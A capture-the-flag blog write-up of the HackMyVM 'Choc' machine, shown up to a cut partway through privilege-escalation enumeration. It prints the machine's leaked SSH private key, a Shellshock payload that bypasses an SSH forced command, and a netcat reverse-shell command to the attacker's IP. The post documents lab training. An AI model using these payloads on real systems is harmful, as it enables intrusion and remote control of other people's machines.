{"id":876,"date":"2025-06-14T23:29:58","date_gmt":"2025-06-14T15:29:58","guid":{"rendered":"http:\/\/162.14.82.114\/?p=876"},"modified":"2025-06-14T23:29:58","modified_gmt":"2025-06-14T15:29:58","slug":"hmv-_-choc","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/876\/06\/14\/2025\/","title":{"rendered":"hmv[-_-]Choc"},"content":{"rendered":"<h1>Choc<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329091.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329091.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250613213042385\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329092.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329092.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614154056340\" style=\"zoom: 50%;\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ sudo nmap -sT -T4 -sC -sV $IP\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-14 03:42 EDT\nNmap scan report for 192.168.10.103\nHost is up (0.0035s latency).\nNot shown: 998 closed tcp ports (conn-refused)\nPORT   STATE SERVICE VERSION\n21\/tcp open  ftp     vsftpd 3.0.3\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:192.168.10.102\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 4\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rwxrwxrwx    1 0        0            1811 Apr 20  2021 id_rsa [NSE: writeable]\n22\/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 c5:66:48:ee:7b:a9:ef:e1:20:26:c5:a8:bf:c5:4d:5c (RSA)\n|   256 80:46:cd:47:a1:ce:a7:fe:56:36:4f:f7:d1:ed:92:c0 (ECDSA)\n|_  256 a2:83:db:7a:7d:38:70:e6:00:16:71:29:ee:04:73:aa (ED25519)\nMAC Address: 08:00:27:05:3C:B3 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 1.53 seconds<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>FTP Service Probing<\/h3>\n<p>Anonymous login turns out to be allowed:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ lftp $IP\nlftp 192.168.10.103:~&gt; ls\n-rwxrwxrwx    1 0        0            1811 Apr 20  2021 id_rsa\nlftp 192.168.10.103:\/&gt; get id_rsa \n1811 bytes transferred\nlftp 192.168.10.103:\/&gt; exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ cat id_rsa      \n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAsQCczRyfpNWE2Ugqm3ZmOI1wjRrg6xHhy5rBBzA5Ih6U9cviHi1c\nclLq1pA8MFgHrO\/G3xx5F2yDVY++PdRI6B96+DsMYYWWuM\/ZrVmiZVrXZZcxMrAuhlK9Uy\nD13N72ZIj21LgFmK8+Gx26UKCLmJfnAIDijymxUUYXyyDqpPtW7DPi1XFoME+WSAqcYkzo\niEjQFD4CJ6wSpK5RaLbfozT7mcE8v8leyMeAno5JzBoNTKrsj\/ti8s3hKZn\/jnMKEua\/41\nVpUnXTtRYpt+95UzaQzio9pMDbGvczv\/YwIze7obtZoe8G\/JXVNCJgnqeAunayUk232Di5\nVe6y4Hx9FwAAA8Ab+Q4SG\/kOEgAAAAdzc2gtcnNhAAABAQCxAJzNHJ+k1YTZSCqbdmY4jX\nCNGuDrEeHLmsEHMDkiHpT1y+IeLVxyUurWkDwwWAes78bfHHkXbINVj7491EjoH3r4Owxh\nhZa4z9mtWaJlWtdllzEysC6GUr1TIPXc3vZkiPbUuAWYrz4bHbpQoIuYl+cAgOKPKbFRRh\nfLIOqk+1bsM+LVcWgwT5ZICpxiTOiISNAUPgInrBKkrlFott+jNPuZwTy\/yV7Ix4CejknM\nGg1MquyP+2LyzeEpmf+OcwoS5r\/jVWlSddO1Fim373lTNpDOKj2kwNsa9zO\/9jAjN7uhu1\nmh7wb8ldU0ImCep4C6drJSTbfYOLlV7rLgfH0XAAAAAwEAAQAAAQBtfN6BdhI+aSF7MkvA\nzJVgqAUWE6lLX01Xn4uFgcvlkhs8i\/h8CD0mLqo7PQ8uLFXbIJrYygkRdzsqQvc\/0b+jbk\n2nnQcEkBjyiwewVkDBB1cz7TkujJLK3gVklX\/gNz8cYyij3oz\/rG7zYQkt9JFFO7lVs2Px\ngK3Bg2UWbm8Wy6aj36XMyPOywdec4tveb5KfcdIb4mWr0QSGLpUr8XuYIUMUofd8iv3QQU\nzpcQMwoOcKCV\/Q+4t8jIF+dOCuBYca9QlY3po48yC9VHv78f8QgQzsazQXqYAusoNesVC6\nHi6+LtpHh+Hr\/m4Z7EFVtLVcNbWgtlhhfCxHBjKaeMGBAAAAgDhFvTbro0SLydbImERRJR\nFLILG+9KEOHgbKU9zBvww5ffGNuVjrkCKegzTCZszr6nLj\/
biZCFMSu7bZiFzWjffwmOdm\nC0sslLd\/ggyYmNotp4TjTEYF+53OFCUm2W8asFXCI9jHrfgR0\/aFwAV9OLJHrzYehKfayT\nnsgAc6SihqAAAAgQDdcvP2mXRHegBcd6rouW4i9ktzECE9ujBy\/KvyzQkVS3e+rhsbjisV\nt2mx1jX8YJ+NA499063\/tn3T9RDGf9U2Cv+2QvO5ZL+5UDLC9ywCEYMPEuOnumbMlK9wuQ\nfRTtHHvKOewBLskyvxCGQGwmxfkeOh5iGpFmiw0R\/O3+nqwQAAAIEAzJ5ixt3FneAcWcGo\nOUZfsk9IVJZoGCSd\/ljYTCPX00l+YmZviVrge3pqCEgNQIiLorPDaPYjY\/rsARZPf1lVS1\n+L0rtKK4BhD+1qR4xebv\/5lKEMktqCn+rt4Z8aejb2Pi5fmNet2zNJTkcsWuVrPG7fHzWa\n6+s3SjFL\/cTmldcAAAAJY2FybEBjaG9jAQI=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>Ah, is it really this plain and simple.....<\/p>\n<h3>Deriving the Public Key from the Private Key to Get the Username<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ chmod 600 id_rsa\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ ssh-keygen -y -f id_rsa      \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxAJzNHJ+k1YTZSCqbdmY4jXCNGuDrEeHLmsEHMDkiHpT1y+IeLVxyUurWkDwwWAes78bfHHkXbINVj7491EjoH3r4OwxhhZa4z9mtWaJlWtdllzEysC6GUr1TIPXc3vZkiPbUuAWYrz4bHbpQoIuYl+cAgOKPKbFRRhfLIOqk+1bsM+LVcWgwT5ZICpxiTOiISNAUPgInrBKkrlFott+jNPuZwTy\/yV7Ix4CejknMGg1MquyP+2LyzeEpmf+OcwoS5r\/jVWlSddO1Fim373lTNpDOKj2kwNsa9zO\/9jAjN7uhu1mh7wb8ldU0ImCep4C6drJSTbfYOLlV7rLgfH0X carl@choc<\/code><\/pre>\n<p>Try logging in:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ ssh carl@$IP -i id_rsa \nThe authenticity of host &#039;192.168.10.103 (192.168.10.103)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:Nk+ApyuQT48pIB1QJmATsKLeg+bt8Ii5CjJvV\/nPTDo.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? 
yes\nWarning: Permanently added &#039;192.168.10.103&#039; (ED25519) to the list of known hosts.\n\n##############################\n#                            #\n#       Welcome to my SSH !  #\n#       Carl.                #\n#                            #\n##############################\n\n        \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557     \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557     \u2588\u2588\u2557      \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557     \n        \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557    \u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551     \n        \u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2551  \u2588\u2588\u2551    \u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551     \n        \u2588\u2588\u2554\u2550\u2550\u255d  \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u255d  \u2588\u2588\u2551  \u2588\u2588\u2551    \u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551     \n        \u2588\u2588\u2551     \u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d    \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n        \u255a\u2550\u255d     
\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d     \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\nConnection to 192.168.10.103 closed.<\/code><\/pre>\n<p>Uh, well....<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329094.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329094.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614154554548\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>Try executing a command???<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ ssh carl@$IP -i id_rsa &quot;pwd&quot;\n\n##############################\n#                            #\n#       Welcome to my SSH !  #\n#       Carl.                
#\n#                            #\n##############################\n\n        \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557     \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557     \u2588\u2588\u2557      \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557     \n        \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557    \u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551     \n        \u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2551  \u2588\u2588\u2551    \u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551     \n        \u2588\u2588\u2554\u2550\u2550\u255d  \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u255d  \u2588\u2588\u2551  \u2588\u2588\u2551    \u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551     \n        \u2588\u2588\u2551     \u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d    \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n        \u255a\u2550\u255d     \u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d     
\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n<\/code><\/pre>\n<p>That does not work. Looking into what is going on, it turns out I cannot even see debug information... Checking the version number for a known vulnerability: <code>OpenSSH 7.9p1<\/code>. It suddenly occurred to me that this might be the <code>shellshock<\/code> vulnerability, using a custom function environment variable to fool the server:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ ssh carl@$IP -i id_rsa &#039;() { :;};whoami&#039;   \n\n##############################\n#                            #\n#       Welcome to my SSH !  #\n#       Carl.                #\n#                            #\n##############################\n\ncarl<\/code><\/pre>\n<p><strong>Note: not a single space can be wrong!!!!<\/strong><\/p>\n<ul>\n<li>\n<p><strong>The space after <code>()<\/code><\/strong>: marks the start of the function definition, triggering Bash to parse it as a function rather than an ordinary string.<\/p>\n<\/li>\n<li>\n<p><strong>The space after {<\/strong>: separates the opening symbol of the function body from the inner command (here the placeholder :).<\/p>\n<p>If either space is missing (e.g. <code>&#039;(){:;};&#039;<\/code>), Bash may ignore the function definition and treat it as just an ordinary environment variable.<\/p>\n<\/li>\n<\/ul>\n<p>Try a reverse shell!!!!!<\/p>\n<pre><code 
class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Choc]\n\u2514\u2500$ ssh carl@$IP -i id_rsa &#039;() { :;};nc -e \/bin\/bash 192.168.10.102 1234&#039;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329095.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329095.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614160812061\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/home\/carl$ ls -la\ntotal 40\ndrwxr-xr-x 5 carl carl 4096 Apr 20  2021 .\ndrwxr-xr-x 5 root root 4096 Apr 18  2021 ..\nlrwxrwxrwx 1 root root    9 Apr 20  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 carl carl  220 Apr 18  2021 .bash_logout\n-rw-r--r-- 1 carl carl 3526 Apr 18  2021 .bashrc\ndrwx------ 3 carl carl 4096 Apr 18  2021 .gnupg\ndrwxr-xr-x 3 carl carl 4096 Apr 18  2021 .local\n-rw-r--r-- 1 carl carl  807 Apr 18  2021 .profile\ndrwx------ 2 carl carl 4096 Apr 20  2021 .ssh\n-rw-r--r-- 1 carl carl 1067 Apr 18  2021 troll.txt\n-rw------- 1 carl carl   52 Apr 18  2021 .Xauthority\n(remote) carl@choc:\/home\/carl$ cat troll.txt \n\n        \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557     \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557     \u2588\u2588\u2557      
\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557     \n        \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557    \u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551     \n        \u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2551  \u2588\u2588\u2551    \u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551     \n        \u2588\u2588\u2554\u2550\u2550\u255d  \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u255d  \u2588\u2588\u2551  \u2588\u2588\u2551    \u2588\u2588\u2551     \u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551     \n        \u2588\u2588\u2551     \u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d    \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n        \u255a\u2550\u255d     \u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d     \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\n(remote) carl@choc:\/home\/carl$ cd .ssh\n(remote) carl@choc:\/home\/carl\/.ssh$ ls -la\ntotal 20\ndrwx------ 2 carl carl 4096 Apr 20  2021 .\ndrwxr-xr-x 5 carl carl 4096 Apr 20  2021 ..\n-rw-r--r-- 1 carl carl  417 Apr 
20  2021 authorized_keys\n-rw------- 1 carl carl 1811 Apr 20  2021 id_rsa\n-rw-r--r-- 1 carl carl  391 Apr 20  2021 id_rsa.pub\n(remote) carl@choc:\/home\/carl\/.ssh$ cat id_rsa.pub\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxAJzNHJ+k1YTZSCqbdmY4jXCNGuDrEeHLmsEHMDkiHpT1y+IeLVxyUurWkDwwWAes78bfHHkXbINVj7491EjoH3r4OwxhhZa4z9mtWaJlWtdllzEysC6GUr1TIPXc3vZkiPbUuAWYrz4bHbpQoIuYl+cAgOKPKbFRRhfLIOqk+1bsM+LVcWgwT5ZICpxiTOiISNAUPgInrBKkrlFott+jNPuZwTy\/yV7Ix4CejknMGg1MquyP+2LyzeEpmf+OcwoS5r\/jVWlSddO1Fim373lTNpDOKj2kwNsa9zO\/9jAjN7uhu1mh7wb8ldU0ImCep4C6drJSTbfYOLlV7rLgfH0X carl@choc\n(remote) carl@choc:\/home\/carl\/.ssh$ cat authorized_keys\ncommand=&quot;cat ~\/troll.txt&quot; ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxAJzNHJ+k1YTZSCqbdmY4jXCNGuDrEeHLmsEHMDkiHpT1y+IeLVxyUurWkDwwWAes78bfHHkXbINVj7491EjoH3r4OwxhhZa4z9mtWaJlWtdllzEysC6GUr1TIPXc3vZkiPbUuAWYrz4bHbpQoIuYl+cAgOKPKbFRRhfLIOqk+1bsM+LVcWgwT5ZICpxiTOiISNAUPgInrBKkrlFott+jNPuZwTy\/yV7Ix4CejknMGg1MquyP+2LyzeEpmf+OcwoS5r\/jVWlSddO1Fim373lTNpDOKj2kwNsa9zO\/9jAjN7uhu1mh7wb8ldU0ImCep4C6drJSTbfYOLlV7rLgfH0X carl@choc\n(remote) carl@choc:\/home\/carl\/.ssh$ cd .. \n(remote) carl@choc:\/home\/carl$ bash --version\nGNU bash, version 4.3.0(1)-release (x86_64-unknown-linux-gnu)\nCopyright (C) 2013 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later &lt;http:\/\/gnu.org\/licenses\/gpl.html&gt;\n\nThis is free software; you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\n(remote) carl@choc:\/home\/carl$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. 
It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\nPassword: \n(remote) carl@choc:\/home\/carl$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/gpasswd\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/chsh\n\/usr\/bin\/mount\n\/usr\/bin\/passwd\n\/usr\/local\/bin\/sudo\n(remote) carl@choc:\/home\/carl$ \/usr\/local\/bin\/sudo -V\nSudo version 1.8.23\nSudoers policy plugin version 1.8.23\nSudoers file grammar version 46\nSudoers I\/O plugin version 1.8.23<\/code><\/pre>\n<p>Turned up a strange <code>sudo<\/code> in an odd location... Next, see which users exist:<\/p>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/home\/carl$ ls -la \/home\/\ntotal 20\ndrwxr-xr-x  5 root  root  4096 Apr 18  2021 .\ndrwxr-xr-x 19 root  root  4096 Apr 18  2021 ..\ndrwxr-xr-x  5 carl  carl  4096 Apr 20  2021 carl\ndrwxrwx---  5 sarah torki 4096 Apr 20  2021 sarah\ndrwxr-xr-x  6 torki torki 4096 Apr 19  2021 torki\n(remote) carl@choc:\/home\/carl$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\ntorki\nsarah\ncarl\nsshd<\/code><\/pre>\n<p>Take a look at what is there:<\/p>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/home\/torki\/secret_garden$ cat diary.txt\n\nApril 18th 2021\nLast night I dreamed that I was at the beach with scarlett johansson, worst wake up call of my life!\n\nSeptember 12th 2309\nI invented a time machine.The world is still crazy, territorial and proud !!\n\nA day in -4.5000000000\nThe human doesn&#039;t exist yet and that&#039;s fucking great!!! 
but I&#039;m a little bored...\n<\/code><\/pre>\n<p>Try uploading <code>pspy64<\/code>.<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329096.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142329096.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614161938117\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Found several scripts:<\/p>\n<pre><code class=\"language-bash\">(remote) carl@choc:\/tmp$ cd \/home\/torki\/\n(remote) carl@choc:\/home\/torki$ ls -la\ntotal 44\ndrwxr-xr-x 6 torki torki 4096 Apr 19  2021 .\ndrwxr-xr-x 5 root  root  4096 Apr 18  2021 ..\n-rwx------ 1 torki torki   71 Apr 18  2021 backup.sh\nlrwxrwxrwx 1 root  root     9 Apr 18  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 torki torki  220 Apr 12  2021 .bash_logout\n-rw-r--r-- 1 torki torki 3526 Apr 12  2021 .bashrc\ndrwx------ 3 torki torki 4096 Apr 12  2021 .gnupg\ndrwxr-xr-x 3 torki torki 4096 Apr 18  2021 .local\n-rw-r--r-- 1 torki torki  807 Apr 12  2021 .profile\ndrwxrwxrwx 2 torki torki 4096 Apr 20  2021 secret_garden\n-rw-r--r-- 1 torki torki   66 Apr 18  2021 